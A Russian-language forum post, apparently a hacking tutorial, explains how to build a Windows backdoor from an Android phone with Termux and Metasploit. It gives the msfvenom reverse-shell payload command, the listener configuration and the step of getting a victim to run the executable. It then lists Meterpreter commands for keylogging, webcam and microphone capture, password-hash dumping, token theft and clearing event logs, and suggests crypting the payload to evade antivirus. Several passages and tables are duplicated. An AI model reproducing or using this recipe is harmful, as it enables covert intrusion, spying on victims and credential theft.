Данный бэкдор использует уязвимость OC windows с помощью терминала TERMUX и metasploit framework.
Благодаря этой уязвимости мы можем коннектиться к веб камере, включать кейлогер, убивать процессы, скринить рабочий стол и многое другое.
Итак приступим:
Теперь немного о эксплоите, как и любой голый RAТ он детектится АВ, можно попробывать закприптовать (может стать не валидным). Metasploit-framework не для однокнопочных, так что фразы аля рмс лучше.... идите лесом. Возможностей у MSF как видите достаточно много, если кому-то понравилось запилю ещё интересную тему с TERMUX.
Благодаря этой уязвимости мы можем коннектиться к веб камере, включать кейлогер, убивать процессы, скринить рабочий стол и многое другое.
Итак приступим:
- Скачиваем TERMUX с playmarket
- Открываем и вводим команду: #pkg upgrade
- Теперь клонируем metasploit: #git clone https://github.com/rapid7/metasploit-framework
- Переходим в директорию metasploit #cd metasploit-framework
- Теперь создаём эксплоит
#msfvenom -p windows/meterpreter/reverse_tcp lhost=IP атакующего lport=4444 -f exe R > /sdcard/mypayload.exe
Файл сохраняется в корне хранилища. - Запускаем metasploit #msfconsole
- #set payload windows/meterpreter/reverse_tcp
- #set LHOST 192.168.1.65 (IP атакующего)
- #set LPORT 4444
- #run
- Всё metasploit запущен, теперь необходимо запустить mypayload.exe на машине жертвы.
- Если появилась строка Meterpreter session 1 opened, то мы успешно подключены.
- Чтобы увидеть список возможностей # -h или ?
Команда Описание
------- -----------
cat Вывести содержимое файла на экран
cd Сменить директорию
checksum Получить контрольную сумму файла
cp Скопировать файл/директорию в другое место
dir Вывести список файлов (псевдоним для ls)
download Загрузить файл или директорию
edit Отредактировать файл
getlwd Вывести локальную рабочую директорию
getwd Вывести рабочую директорию
lcd Изменить локальную рабочу директорию
lpwd Вывести локальную рабочую директорию
ls Показать список файлов
mkdir Создать директорию
mv Переместить файл/директорию в другое место
pwd Вывести рабочую директорию
rm Удалить указанный файл
rmdir Удалить директорию
search Поиск файлов
show_mount Вывести всех точек монтирования/логических дисков
upload Выгрузить файл или директорию
------- -----------
cat Вывести содержимое файла на экран
cd Сменить директорию
checksum Получить контрольную сумму файла
cp Скопировать файл/директорию в другое место
dir Вывести список файлов (псевдоним для ls)
download Загрузить файл или директорию
edit Отредактировать файл
getlwd Вывести локальную рабочую директорию
getwd Вывести рабочую директорию
lcd Изменить локальную рабочу директорию
lpwd Вывести локальную рабочую директорию
ls Показать список файлов
mkdir Создать директорию
mv Переместить файл/директорию в другое место
pwd Вывести рабочую директорию
rm Удалить указанный файл
rmdir Удалить директорию
search Поиск файлов
show_mount Вывести всех точек монтирования/логических дисков
upload Выгрузить файл или директорию
Команда Описание
------- -----------
arp Показать ARP кэш хоста
getproxy Показать текущие настройки прокси
ifconfig Показать интерфейсы
ipconfig Показать интерфейсы
netstat Показать сетевые соединения
portfwd Перенаправить локальный порт на удалённую службу
resolve Сделать запросы с цели на преобразование одного или нескольких имён хостов
route Просмотр и изменение таблицы маршрутизации
------- -----------
arp Показать ARP кэш хоста
getproxy Показать текущие настройки прокси
ifconfig Показать интерфейсы
ipconfig Показать интерфейсы
netstat Показать сетевые соединения
portfwd Перенаправить локальный порт на удалённую службу
resolve Сделать запросы с цели на преобразование одного или нескольких имён хостов
route Просмотр и изменение таблицы маршрутизации
Команда Описание
------- -----------
clearev Очистить журнал событий
drop_token Отбрасывает любой активный токен имперсонализации.
execute Выполнить команду
getenv Получить значение одной или более переменных окружения
getpid Получить идентификатор текущего процесса
getprivs Попытаться включить все привилегии, доступные для текущего процесса
getsid Получение SID пользователя
getuid Получение имени пользователя
kill Завершить процесс
localtime Показать локальную дату и время целевой системы
pgrep Фильтрация процессов по имени
pkill Завершить процесс по имени
ps Список запущенных процессов
reboot Перезагрузить удалённый компьютер
reg Изменение и взаимодействие с удалённым регистром
rev2self Вызов RevertToSelf() на удалённой машине
shell Перейти в системную командную оболочку
shutdown Отключить удалённый компьютер
steal_token Попытаться украсть impersonation token из целевого процесса
suspend Приостанавливает или возобновляет список процессов
sysinfo Получает информацию об удалённой системе, такую как вид ОС
------- -----------
clearev Очистить журнал событий
drop_token Отбрасывает любой активный токен имперсонализации.
execute Выполнить команду
getenv Получить значение одной или более переменных окружения
getpid Получить идентификатор текущего процесса
getprivs Попытаться включить все привилегии, доступные для текущего процесса
getsid Получение SID пользователя
getuid Получение имени пользователя
kill Завершить процесс
localtime Показать локальную дату и время целевой системы
pgrep Фильтрация процессов по имени
pkill Завершить процесс по имени
ps Список запущенных процессов
reboot Перезагрузить удалённый компьютер
reg Изменение и взаимодействие с удалённым регистром
rev2self Вызов RevertToSelf() на удалённой машине
shell Перейти в системную командную оболочку
shutdown Отключить удалённый компьютер
steal_token Попытаться украсть impersonation token из целевого процесса
suspend Приостанавливает или возобновляет список процессов
sysinfo Получает информацию об удалённой системе, такую как вид ОС
Команда Описание
------- -----------
enumdesktops Список всех доступных рабочих столов и оконных станций
getdesktop Получить текущий рабочий стол meterpreter
idletime Возвращает количество секунд отсутствия активности удалённого пользователя
keyscan_dump Дамп буфера нажатия клавиш
keyscan_start Запустить захват нажатие клавиш
keyscan_stop Остановить захват нажатия клавиш
screenshot Получение скриншота интерактивного рабочего стола
setdesktop Изменение текущего рабочего стола meterpreters
uictl Контроль некоторых компонентов пользовательских интерфейсов
------- -----------
enumdesktops Список всех доступных рабочих столов и оконных станций
getdesktop Получить текущий рабочий стол meterpreter
idletime Возвращает количество секунд отсутствия активности удалённого пользователя
keyscan_dump Дамп буфера нажатия клавиш
keyscan_start Запустить захват нажатие клавиш
keyscan_stop Остановить захват нажатия клавиш
screenshot Получение скриншота интерактивного рабочего стола
setdesktop Изменение текущего рабочего стола meterpreters
uictl Контроль некоторых компонентов пользовательских интерфейсов
Команда Описание
------- -----------
record_mic Запись аудио со стандартного микрофона в течение X секунд
webcam_chat Начать видеочат
webcam_list Вывести список веб-камер
webcam_snap Сделать снимок указанной веб-камерой
webcam_stream Запустить выдиопоток с выбранной веб-камеры
------- -----------
record_mic Запись аудио со стандартного микрофона в течение X секунд
webcam_chat Начать видеочат
webcam_list Вывести список веб-камер
webcam_snap Сделать снимок указанной веб-камерой
webcam_stream Запустить выдиопоток с выбранной веб-камеры
Команда Описание
------- -----------
hashdump Дампит содержимое базы данных SAM
------- -----------
hashdump Дампит содержимое базы данных SAM
Теперь немного о эксплоите, как и любой голый RAТ он детектится АВ, можно попробывать закприптовать (может стать не валидным). Metasploit-framework не для однокнопочных, так что фразы аля рмс лучше.... идите лесом. Возможностей у MSF как видите достаточно много, если кому-то понравилось запилю ещё интересную тему с TERMUX.
Последнее редактирование: